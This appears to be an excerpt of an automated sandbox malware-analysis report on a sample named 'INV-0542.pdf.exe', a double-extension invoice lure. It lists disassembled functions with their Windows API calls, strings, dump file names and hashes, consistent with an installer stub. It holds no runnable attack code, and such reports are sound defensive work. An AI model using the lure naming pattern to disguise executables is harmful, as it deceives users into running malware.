GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
GlobalFree.KERNEL32(00000000), ref: 004062EF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Strings

[Rename], xrefs: 00406270, 00406282
%ls=%ls, xrefs: 004061FC

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD

Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
CharNextW.USER32(?,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

Strings

"C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00406833
*?|<>/":, xrefs: 00406841
C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4006617364
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD

Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404544
GetSysColor.USER32(00000000), ref: 00404582
SetTextColor.GDI32(?,00000000), ref: 0040458E
SetBkMode.GDI32(?,?), ref: 0040459A
GetSysColor.USER32(?), ref: 004045AD
SetBkColor.GDI32(?,?), ref: 004045BD
DeleteObject.GDI32(?), ref: 004045D7
CreateBrushIndirect.GDI32(?), ref: 004045E1

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1

Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D

Strings

9, xrefs: 00402760

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58

Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
GetMessagePos.USER32 ref: 00404E9E
ScreenToClient.USER32(?,?), ref: 00404EB8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0

Strings

f, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4

Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E76
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
ReleaseDC.USER32(?,00000000), ref: 00401EA9
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8

Strings

Tahoma, xrefs: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C

Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(000E0F4C,00000064,000E1878), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

verifying installer: %d%%, xrefs: 0040300B

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58

Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
GlobalFree.KERNEL32(?), ref: 00402A2B
GlobalFree.KERNEL32(00000000), ref: 00402A3E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8

Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68

Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DBF
GetClientRect.USER32(?,?), ref: 00401E0A
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
DeleteObject.GDI32(00000000), ref: 00401E5E

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98

Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0

Strings

!, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98

Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
wsprintfW.USER32 ref: 00404E17
SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

%u.%u%s%s, xrefs: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8

Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
